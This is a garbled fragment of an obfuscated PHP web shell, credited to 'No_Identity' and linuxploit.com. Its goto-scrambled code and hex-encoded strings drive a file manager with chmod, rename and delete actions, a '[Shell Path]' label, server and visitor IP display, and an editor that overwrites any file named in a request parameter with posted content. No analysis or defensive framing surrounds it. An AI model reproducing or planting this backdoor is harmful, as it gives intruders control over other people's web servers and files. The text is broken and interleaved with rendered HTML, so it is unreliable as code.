"> "> "class="btn"onclick='return chtime(this," ")'> "class="btn"onclick='return chmod(this," ")'> "class="btn icon delete"onclick='return confirm("Sure to delete?")'title="Delete"> "class="btn icon rename"onclick='return rename(this," ")'title="Rename"> > 12] . implode('', array_map(function ($b, $m) { return $b == "\61" ? $m : "\55"; }, str_split(decbin($perms & 4095) . ''), str_split("\162\167\x78\x72\x77\x78\162\167\170"))); return $info . "\x20" . substr(sprintf("\x25\x6f", @fileperms($path)), -4); } goto cLtwK; m1QUh: ?> "> 2) { flush(); $count++; } } } $dom = "{$count}\x20\x44\157\x6d\x61\151\x6e"; } return $dom; } goto eCm9p; rBvqN: echo is_writable($dir) ? "\x77\x72\151\x74\141\x62\154\x65" : "\x6e\x6f\x74\167\162\x69\x74\x61\142\x6c\145"; goto OuL0o; cLtwK: if (!function_exists("\160\x6f\x73\x69\170\x5f\147\145\164\x70\x77\165\151\144") && !extension_loaded("\x70\x6f\x73\x69\170")) { function posix_getpwuid($x) { return array("\x6e\x61\155\145" => "\55\55\55"); } } goto K42CU; LR6tS: if (isset($_GET["\x66\151\x6c\145"])) { if (isset($_POST["\145\x64\x69\164"])) { if (@file_put_contents($_GET["\146\151\x6c\145"], $_POST["\145\x64\151\164"])) { echo "\74\163\x70\x61\x6e\40\x63\154\141\x73\163\x3d\x22\163\x75\143\x63\x65\163\163\42\76\105\x44\111\124\40\x53\x55\x43\x43\x45\x53\123\41\74\57\163\160\141\156\76"; } else { echo "\74\x73\160\x61\156\40\x63\x6c\141\x73\163\x3d\x22\x66\x61\x69\154\145\144\x22\76\x45\104\111\x54\x20\106\x41\x49\114\105\x44\x21\x3c\x2f\163\x70\141\156\x3e"; } } echo "\74\146\x6f\x72\x6d\x20\141\143\x74\x69\x6f\x6e\x3d\x22\77\146\x69\154\x65\75" . e($_GET["\146\x69\x6c\x65"]) . "\x26" . $edir . "\42\x20\155\x65\164\150\x6f\144\x3d\x22\160\157\x73\164\x22\40\x6f\x6e\163\165\x62\155\x69\x74\x3d\42\x65\144\x69\164\x2e\x76\x61\154\165\145\x3d\145\x28\x65\x64\151\x74\x2e\166\141\x6c\x75\x65\x29\42\x3e\x3c\x74\145\x78\164\x61\x72\x65\141\40\151\144\75\x22\145\144\151\x74\x22\x20\x6e\141\155\x65\x3d\x22\145\x64\151\164\42\76" . htmlspecialchars(file_get_contents($_GET["\x66\151\x6c\x65"]), ENT_QUOTES | ENT_SUBSTITUTE | ENT_COMPAT, "\x55\x54\106\55\x38") . "\74\57\164\x65\170\x74\141\162\x65\141\76\x3c\142\165\x74\x74\x6f\x6e\76\125\x70\x64\x61\x74\145\x3c\57\142\x75\164\x74\157\156\x3e\x3c\x2f\146\x6f\162\155\x3e"; } goto UtMjm; fEYxs: ?> ">[Shell Path]
SERVER INFO: $v) { $_POST[$k] = d($v); } goto LJQkQ; m2IZa: echo $edir; goto UJMti; UJMti: ?> "enctype="multipart/form-data"method="post">

SERVER IP: 403 ForbiddenYOUR IP:
">[Root Path] "name="dir"id="dir"style="width:500px"value="
Directory:
SIZEModified DatePERMSACTION
Modified By #No_Identity :: github.com/yon3zu - linuxploit.com